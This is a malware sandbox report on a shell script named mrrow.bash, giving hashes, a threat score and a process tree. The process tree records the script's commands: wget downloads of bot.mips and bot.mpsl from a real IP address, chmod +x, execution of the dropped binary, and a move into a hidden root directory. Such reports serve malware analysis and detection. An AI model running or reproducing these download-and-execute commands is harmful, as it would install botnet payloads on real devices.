Overview

overview

5

Static

static

mrrow.bash

ubuntu-18.04-amd64

5

mrrow.bash

debian-9-armhf

5

mrrow.bash

debian-9-mips

5

mrrow.bash

debian-9-mipsel

5

Resubmissions

09-08-2022 19:31

220809-x8ezrafabp 5

09-08-2022 19:22

220809-x28cqaehdq 5

09-08-2022 19:21

220809-x2ny3sgec6 5

Analysis

  • max time network
    4s
  • platform
    linux_mips
  • resource
    debian9-mipsbe-en-20211208
  • resource tags

    arch:mipsimage:debian9-mipsbe-en-20211208kernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    09-08-2022 19:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    mrrow.bash

  • Size

    2KB

  • MD5

    9486bdff70b6ec6243b012a91e90c21e

  • SHA1

    2364e70ee0d49e4e641fa7428958f5907a8c26a3

  • SHA256

    2db0ba4efda0653533e32abca1417cafb84f58322dc8d4df183e64771626b826

  • SHA512

    e64e2324c403d967d3d04140bb0eba159e57b83db09fdd50e882a8edc595211837505c86c1d44a65d11b9c3a34c0d02496b3c06f264e1175e248397e9716b4bd

Score
5/10

Malware Config

Signatures

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/mrrow.bash
    /tmp/mrrow.bash
    1⤵
    • Writes file to tmp directory
    PID:320
    • /usr/bin/wget
      wget http://109.206.241.211/bins/bot.mips
      2⤵
        PID:321
      • /bin/cat
        cat bot.mips
        2⤵
          PID:323
        • /bin/chmod
          chmod +x bot.mips fuwwyowo mrrow.bash systemd-private-a274da174cb44ad4b78e55297a3aefdc-systemd-timesyncd.service-qJHWtF
          2⤵
            PID:324
          • ./fuwwyowo
            ./fuwwyowo ssh
            2⤵
              PID:325
            • /usr/bin/wget
              wget http://109.206.241.211/bins/bot.mpsl
              2⤵
                PID:327
            • /bin/sh
              sh -c "mkdir /3hf3qkb7nn/ && >/3hf3qkb7nn/3hf3qkb7nn && cd /3hf3qkb7nn/ >/dev/null"
              1⤵
                PID:329
                • /bin/mkdir
                  mkdir /3hf3qkb7nn/
                  2⤵
                  • Reads runtime system information
                  PID:330
              • /bin/sh
                sh -c "mv /tmp/fuwwyowo /3hf3qkb7nn/3hf3qkb7nn && chmod 777 /3hf3qkb7nn/3hf3qkb7nn >/dev/null"
                1⤵
                  PID:331
                  • /bin/mv
                    mv /tmp/fuwwyowo /3hf3qkb7nn/3hf3qkb7nn
                    2⤵
                    • Reads runtime system information
                    PID:332
                  • /bin/chmod
                    chmod 777 /3hf3qkb7nn/3hf3qkb7nn
                    2⤵
                      PID:333

                  Network

                  MITRE ATT&CK Matrix

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads